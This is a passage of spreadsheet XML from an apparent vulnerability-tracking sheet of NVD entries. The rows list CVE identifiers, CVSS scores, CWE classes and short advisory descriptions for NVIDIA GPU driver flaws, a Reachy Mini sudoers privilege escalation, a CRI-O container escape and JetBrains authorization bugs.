          <t>NVIDIA GPU Display Driver for Linux contains a vulnerability where an unprivileged user could cause a use-after-free. A successful exploit of this vulnerability might lead to code execution, escalation of privileges, denial of service, information disclosure, and data tampering.</t>
        </is>
      </c>
      <c r="T195" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-47587</t>
        </is>
      </c>
    </row>
    <row r="196">
      <c r="A196" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B196" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C196" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-47588</t>
        </is>
      </c>
      <c r="D196" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E196" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F196" s="5" t="inlineStr">
        <is>
          <t>psirt@nvidia.com</t>
        </is>
      </c>
      <c r="G196" s="5" t="inlineStr"/>
      <c r="H196" s="5" t="inlineStr"/>
      <c r="I196" s="5" t="inlineStr"/>
      <c r="J196" s="5" t="inlineStr"/>
      <c r="K196" s="5" t="inlineStr"/>
      <c r="L196" s="5" t="inlineStr"/>
      <c r="M196" s="5" t="inlineStr"/>
      <c r="N196" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O196" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P196" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q196" s="5" t="inlineStr"/>
      <c r="R196" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="S196" s="5" t="inlineStr">
        <is>
          <t>NVIDIA GPU Display Driver for Linux contains a vulnerability where an unprivileged user could cause a use-after-free condition by issuing a sequence of driver commands. A successful exploit of this vulnerability might lead to code execution, escalation of privileges, denial of service and information disclosure.</t>
        </is>
      </c>
      <c r="T196" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-47588</t>
        </is>
      </c>
    </row>
    <row r="197">
      <c r="A197" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B197" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C197" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-47589</t>
        </is>
      </c>
      <c r="D197" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E197" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F197" s="5" t="inlineStr">
        <is>
          <t>psirt@nvidia.com</t>
        </is>
      </c>
      <c r="G197" s="5" t="inlineStr"/>
      <c r="H197" s="5" t="inlineStr"/>
      <c r="I197" s="5" t="inlineStr"/>
      <c r="J197" s="5" t="inlineStr"/>
      <c r="K197" s="5" t="inlineStr"/>
      <c r="L197" s="5" t="inlineStr"/>
      <c r="M197" s="5" t="inlineStr"/>
      <c r="N197" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O197" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P197" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q197" s="5" t="inlineStr"/>
      <c r="R197" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="S197"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and information disclosure.</t>
        </is>
      </c>
      <c r="T197" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-47589</t>
        </is>
      </c>
    </row>
    <row r="198">
      <c r="A198" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B198" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C198" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-47590</t>
        </is>
      </c>
      <c r="D198" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E198" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F198" s="5" t="inlineStr">
        <is>
          <t>psirt@nvidia.com</t>
        </is>
      </c>
      <c r="G198" s="5" t="inlineStr"/>
      <c r="H198" s="5" t="inlineStr"/>
      <c r="I198" s="5" t="inlineStr"/>
      <c r="J198" s="5" t="inlineStr"/>
      <c r="K198" s="5" t="inlineStr"/>
      <c r="L198" s="5" t="inlineStr"/>
      <c r="M198" s="5" t="inlineStr"/>
      <c r="N198" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O198" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P198" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q198" s="5" t="inlineStr"/>
      <c r="R198" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="S198"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and information disclosure.</t>
        </is>
      </c>
      <c r="T198" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-47590</t>
        </is>
      </c>
    </row>
    <row r="199">
      <c r="A199" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B199" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C199" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-47591</t>
        </is>
      </c>
      <c r="D199" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E199" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F199" s="5" t="inlineStr">
        <is>
          <t>psirt@nvidia.com</t>
        </is>
      </c>
      <c r="G199" s="5" t="inlineStr"/>
      <c r="H199" s="5" t="inlineStr"/>
      <c r="I199" s="5" t="inlineStr"/>
      <c r="J199" s="5" t="inlineStr"/>
      <c r="K199" s="5" t="inlineStr"/>
      <c r="L199" s="5" t="inlineStr"/>
      <c r="M199" s="5" t="inlineStr"/>
      <c r="N199" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O199" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P199" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q199" s="5" t="inlineStr"/>
      <c r="R199" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="S199" s="5" t="inlineStr">
        <is>
          <t>NVIDIA GPU Display Driver for Linux contains a vulnerability in the kernel mode layer where an unprivileged user could bypass read-only memory protection due to incorrect authorization, enabling write access to memory marked read-only. A successful exploit of this vulnerability might lead to code execution, denial of service, escalation of privileges, information disclosure, and data tampering.</t>
        </is>
      </c>
      <c r="T199" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-47591</t>
        </is>
      </c>
    </row>
    <row r="200">
      <c r="A200" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B200" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C200" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-47592</t>
        </is>
      </c>
      <c r="D200" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E200" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F200" s="5" t="inlineStr">
        <is>
          <t>psirt@nvidia.com</t>
        </is>
      </c>
      <c r="G200" s="5" t="inlineStr"/>
      <c r="H200" s="5" t="inlineStr"/>
      <c r="I200" s="5" t="inlineStr"/>
      <c r="J200" s="5" t="inlineStr"/>
      <c r="K200" s="5" t="inlineStr"/>
      <c r="L200" s="5" t="inlineStr"/>
      <c r="M200" s="5" t="inlineStr"/>
      <c r="N200" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O200" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P200" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q200" s="5" t="inlineStr"/>
      <c r="R200" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="S200" s="5" t="inlineStr">
        <is>
          <t>NVIDIA GPU Display Driver for Windows and Linux contains a vulnerability in the kernel mode layer where an unprivileged user could cause an out-of-bounds read. A successful exploit of this vulnerability might lead to code execution, denial of service, escalation of privileges, information disclosure, and data tampering.</t>
        </is>
      </c>
      <c r="T200" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-47592</t>
        </is>
      </c>
    </row>
    <row r="201">
      <c r="A201" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B201" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C201" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-47593</t>
        </is>
      </c>
      <c r="D201" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E201" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F201" s="5" t="inlineStr">
        <is>
          <t>psirt@nvidia.com</t>
        </is>
      </c>
      <c r="G201" s="5" t="inlineStr"/>
      <c r="H201" s="5" t="inlineStr"/>
      <c r="I201" s="5" t="inlineStr"/>
      <c r="J201" s="5" t="inlineStr"/>
      <c r="K201" s="5" t="inlineStr"/>
      <c r="L201" s="5" t="inlineStr"/>
      <c r="M201" s="5" t="inlineStr"/>
      <c r="N201" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O201" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P201" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q201" s="5" t="inlineStr"/>
      <c r="R201" s="5" t="inlineStr">
        <is>
          <t>CWE-121</t>
        </is>
      </c>
      <c r="S201" s="5" t="inlineStr">
        <is>
          <t>NVIDIA GPU Display Driver for Windows contains a vulnerability in the kernel mode layer where an unprivileged user can cause an out-of-bounds write. A successful exploit of this vulnerability might lead to code execution, escalation of privileges, and denial of service.</t>
        </is>
      </c>
      <c r="T201" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-47593</t>
        </is>
      </c>
    </row>
    <row r="202">
      <c r="A202" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B202" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C202" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-47594</t>
        </is>
      </c>
      <c r="D202" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E202" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F202" s="5" t="inlineStr">
        <is>
          <t>psirt@nvidia.com</t>
        </is>
      </c>
      <c r="G202" s="5" t="inlineStr"/>
      <c r="H202" s="5" t="inlineStr"/>
      <c r="I202" s="5" t="inlineStr"/>
      <c r="J202" s="5" t="inlineStr"/>
      <c r="K202" s="5" t="inlineStr"/>
      <c r="L202" s="5" t="inlineStr"/>
      <c r="M202" s="5" t="inlineStr"/>
      <c r="N202" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O202" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P202" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q202" s="5" t="inlineStr"/>
      <c r="R202" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="S202"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data tampering, and information disclosure.</t>
        </is>
      </c>
      <c r="T202" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-47594</t>
        </is>
      </c>
    </row>
    <row r="203">
      <c r="A203" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B203" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C203" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-47595</t>
        </is>
      </c>
      <c r="D203" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E203" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F203" s="5" t="inlineStr">
        <is>
          <t>psirt@nvidia.com</t>
        </is>
      </c>
      <c r="G203" s="5" t="inlineStr"/>
      <c r="H203" s="5" t="inlineStr"/>
      <c r="I203" s="5" t="inlineStr"/>
      <c r="J203" s="5" t="inlineStr"/>
      <c r="K203" s="5" t="inlineStr"/>
      <c r="L203" s="5" t="inlineStr"/>
      <c r="M203" s="5" t="inlineStr"/>
      <c r="N203" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O203" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P203" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q203" s="5" t="inlineStr"/>
      <c r="R203" s="5" t="inlineStr">
        <is>
          <t>CWE-281</t>
        </is>
      </c>
      <c r="S203" s="5" t="inlineStr">
        <is>
          <t>NVIDIA GPU Display Driver for Linux contains a vulnerability in the kernel mode layer where an unprivileged user can write to read-only memory because the memory's permissions are not preserved. A successful exploit of this vulnerability might lead to code execution, escalation of privileges, denial of service, information disclosure, and data tampering.</t>
        </is>
      </c>
      <c r="T203" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-47595</t>
        </is>
      </c>
    </row>
    <row r="204">
      <c r="A204" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B204" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C204" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-47597</t>
        </is>
      </c>
      <c r="D204" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E204" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F204" s="5" t="inlineStr">
        <is>
          <t>psirt@nvidia.com</t>
        </is>
      </c>
      <c r="G204" s="5" t="inlineStr"/>
      <c r="H204" s="5" t="inlineStr"/>
      <c r="I204" s="5" t="inlineStr"/>
      <c r="J204" s="5" t="inlineStr"/>
      <c r="K204" s="5" t="inlineStr"/>
      <c r="L204" s="5" t="inlineStr"/>
      <c r="M204" s="5" t="inlineStr"/>
      <c r="N204" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O204" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P204" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q204" s="5" t="inlineStr"/>
      <c r="R204" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="S204" s="5" t="inlineStr">
        <is>
          <t>NVIDIA GPU Display Driver for Windows and Linux contains a vulnerability in the open-source kernel module Resource Server where an unprivileged local user could cause a use-after-free through a missing self-reference guard in the map cleanup path. A successful exploit of this vulnerability might lead to code execution, escalation of privileges, denial of service, information disclosure, and data tampering.</t>
        </is>
      </c>
      <c r="T204" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-47597</t>
        </is>
      </c>
    </row>
    <row r="205">
      <c r="A205" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B205" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C205" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-47599</t>
        </is>
      </c>
      <c r="D205" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E205" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F205" s="5" t="inlineStr">
        <is>
          <t>psirt@nvidia.com</t>
        </is>
      </c>
      <c r="G205" s="5" t="inlineStr"/>
      <c r="H205" s="5" t="inlineStr"/>
      <c r="I205" s="5" t="inlineStr"/>
      <c r="J205" s="5" t="inlineStr"/>
      <c r="K205" s="5" t="inlineStr"/>
      <c r="L205" s="5" t="inlineStr"/>
      <c r="M205" s="5" t="inlineStr"/>
      <c r="N205" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O205" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P205" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q205" s="5" t="inlineStr"/>
      <c r="R205" s="5" t="inlineStr">
        <is>
          <t>CWE-281</t>
        </is>
      </c>
      <c r="S205" s="5" t="inlineStr">
        <is>
          <t>NVIDIA GPU Display Driver for Linux contains a vulnerability in the open-source kernel module where an unprivileged local user could cause improper preservation of memory access permissions during DMA mapping. A successful exploit of this vulnerability might lead to code execution, escalation of privileges, denial of service, information disclosure, and data tampering.</t>
        </is>
      </c>
      <c r="T205" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-47599</t>
        </is>
      </c>
    </row>
    <row r="206">
      <c r="A206" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B206" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C206" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-47600</t>
        </is>
      </c>
      <c r="D206" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E206" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F206" s="5" t="inlineStr">
        <is>
          <t>psirt@nvidia.com</t>
        </is>
      </c>
      <c r="G206" s="5" t="inlineStr"/>
      <c r="H206" s="5" t="inlineStr"/>
      <c r="I206" s="5" t="inlineStr"/>
      <c r="J206" s="5" t="inlineStr"/>
      <c r="K206" s="5" t="inlineStr"/>
      <c r="L206" s="5" t="inlineStr"/>
      <c r="M206" s="5" t="inlineStr"/>
      <c r="N206" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O206" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P206" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q206" s="5" t="inlineStr"/>
      <c r="R206" s="5" t="inlineStr">
        <is>
          <t>CWE-908</t>
        </is>
      </c>
      <c r="S206" s="5" t="inlineStr">
        <is>
          <t>NVIDIA GPU Display Driver for Windows and Linux contains a vulnerability in the kernel mode layer where an error-handling path could operate on an improperly initialized resource. A successful exploit of this vulnerability might lead to code execution, escalation of privileges, denial of service, information disclosure, and data tampering.</t>
        </is>
      </c>
      <c r="T206" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-47600</t>
        </is>
      </c>
    </row>
    <row r="207">
      <c r="A207" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B207" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C207" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-47601</t>
        </is>
      </c>
      <c r="D207" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E207" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F207" s="5" t="inlineStr">
        <is>
          <t>psirt@nvidia.com</t>
        </is>
      </c>
      <c r="G207" s="5" t="inlineStr"/>
      <c r="H207" s="5" t="inlineStr"/>
      <c r="I207" s="5" t="inlineStr"/>
      <c r="J207" s="5" t="inlineStr"/>
      <c r="K207" s="5" t="inlineStr"/>
      <c r="L207" s="5" t="inlineStr"/>
      <c r="M207" s="5" t="inlineStr"/>
      <c r="N207" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O207" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P207" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q207" s="5" t="inlineStr"/>
      <c r="R207" s="5" t="inlineStr">
        <is>
          <t>CWE-787</t>
        </is>
      </c>
      <c r="S207" s="5" t="inlineStr">
        <is>
          <t>NVIDIA GPU Display Driver for Windows and Linux contains a vulnerability in the open-source kernel module DMA-BUF import path where an unprivileged local user could cause improper preservation of memory access permissions when importing a read-only buffer from another device's DMA-BUF exporter. A successful exploit of this vulnerability might lead to code execution, escalation of privileges, denial of service, information disclosure, and data tampering.</t>
        </is>
      </c>
      <c r="T207" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-47601</t>
        </is>
      </c>
    </row>
    <row r="208">
      <c r="A208" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B208" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C208" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-53605</t>
        </is>
      </c>
      <c r="D208" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E208" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F208" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G208" s="5" t="inlineStr"/>
      <c r="H208" s="5" t="inlineStr"/>
      <c r="I208" s="5" t="inlineStr"/>
      <c r="J208" s="5" t="inlineStr"/>
      <c r="K208" s="5" t="inlineStr"/>
      <c r="L208" s="5" t="inlineStr"/>
      <c r="M208" s="5" t="inlineStr"/>
      <c r="N208" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O208" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P208" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q208" s="5" t="inlineStr"/>
      <c r="R208" s="5" t="inlineStr">
        <is>
          <t>CWE-250, CWE-269</t>
        </is>
      </c>
      <c r="S208" s="5" t="inlineStr">
        <is>
          <t>Reachy Mini ISO for Wireless contains the necessary files to build a custom Raspberry Pi OS image for the Reachy Mini Wireless robot, using pi-gen. Prior to version 0.2.4, the Reachy Mini Wireless OS image shipped with an overly broad sudoers entry granting the pollen daemon user (uid 1000) passwordless sudo access to /usr/bin/systemctl with no subcommand or argument restriction. This is a local privilege escalation (LPE). Any process running as pollen can obtain full root (uid 0) on the device in three commands, with no additional vulnerability required and no user interaction. This issue has been patched in version 0.2.4.</t>
        </is>
      </c>
      <c r="T208" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-53605</t>
        </is>
      </c>
    </row>
    <row r="209">
      <c r="A209" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B209" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C209" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-62146</t>
        </is>
      </c>
      <c r="D209" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E209" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F209" s="5" t="inlineStr">
        <is>
          <t>secalert@redhat.com</t>
        </is>
      </c>
      <c r="G209" s="5" t="inlineStr"/>
      <c r="H209" s="5" t="inlineStr"/>
      <c r="I209" s="5" t="inlineStr"/>
      <c r="J209" s="5" t="inlineStr">
        <is>
          <t>rust</t>
        </is>
      </c>
      <c r="K209" s="5" t="inlineStr"/>
      <c r="L209" s="5" t="inlineStr"/>
      <c r="M209" s="5" t="inlineStr"/>
      <c r="N209" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O209" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P209" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q209" s="5" t="inlineStr"/>
      <c r="R209" s="5" t="inlineStr">
        <is>
          <t>CWE-501</t>
        </is>
      </c>
      <c r="S209" s="5" t="inlineStr">
        <is>
          <t>A trust-boundary flaw in CRI-O's sandbox state persistence allows attacker-influenced pod metadata to overwrite CRI-O's own reserved sandbox bookkeeping; once reloaded as trusted after a restart, a later container recreate in that sandbox can expose a host-side runtime-management resource inside the container, enabling container escape.</t>
        </is>
      </c>
      <c r="T209" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-62146</t>
        </is>
      </c>
    </row>
    <row r="210">
      <c r="A210" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B210" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C210" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100266</t>
        </is>
      </c>
      <c r="D210" s="5" t="n">
        <v>7.7</v>
      </c>
      <c r="E210" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F210" s="5" t="inlineStr">
        <is>
          <t>cve@jetbrains.com</t>
        </is>
      </c>
      <c r="G210" s="5" t="inlineStr"/>
      <c r="H210" s="5" t="inlineStr"/>
      <c r="I210" s="5" t="inlineStr"/>
      <c r="J210" s="5" t="inlineStr">
        <is>
          <t>rust</t>
        </is>
      </c>
      <c r="K210" s="5" t="inlineStr"/>
      <c r="L210" s="5" t="inlineStr"/>
      <c r="M210" s="5" t="inlineStr"/>
      <c r="N210" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O210" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P210" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q210" s="5" t="inlineStr"/>
      <c r="R210" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="S210" s="5" t="inlineStr">
        <is>
          <t>In JetBrains Hub before 2026.2.52366 missing authorisation allowed authenticated users to send arbitrary emails from the server's trusted address</t>
        </is>
      </c>
      <c r="T210" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100266</t>
        </is>
      </c>
    </row>
    <row r="211">
      <c r="A211" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B211" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C211" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100268</t>
        </is>
      </c>
      <c r="D211" s="5" t="n">
        <v>7.7</v>
      </c>
      <c r="E211" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F211" s="5" t="inlineStr">
        <is>
          <t>cve@jetbrains.com</t>
        </is>
      </c>
      <c r="G211" s="5" t="inlineStr"/>
      <c r="H211" s="5" t="inlineStr"/>
      <c r="I211" s="5" t="inlineStr"/>
      <c r="J211" s="5" t="inlineStr"/>
      <c r="K211" s="5" t="inlineStr"/>
      <c r="L211" s="5" t="inlineStr"/>
      <c r="M211" s="5" t="inlineStr"/>
      <c r="N211" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O211" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P211" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q211" s="5" t="inlineStr"/>
      <c r="R211" s="5" t="inlineStr">
        <is>
          <t>CWE-639</t>
        </is>
      </c>
      <c r="S211" s="5" t="inlineStr">
        <is>
          <t>In JetBrains YouTrack before 2026.2.19197 project administrators could read comments from other projects via notification templates</t>
        </is>
      </c>
      <c r="T211" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100268</t>
        </is>
      </c>
    </row>
    <row r="212">
      <c r="A212" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B212" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C212" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-47576</t>
        </is>
      </c>
      <c r="D212" s="5" t="n">
        <v>7.7</v>
      </c>
      <c r="E212" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F212" s="5" t="inlineStr">
        <is>
          <t>psirt@nvidia.com</t>
        </is>
      </c>
      <c r="G212" s="5" t="inlineStr"/>
      <c r="H212" s="5" t="inlineStr"/>
      <c r="I212" s="5" t="inlineStr"/>
      <c r="J212" s="5" t="inlineStr"/>
      <c r="K212" s="5" t="inlineStr"/>
      <c r="L212" s="5" t="inlineStr"/>
      <c r="M212" s="5" t="inlineStr"/>
      <c r="N212" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O212" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P212" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q212" s="5" t="inlineStr"/>
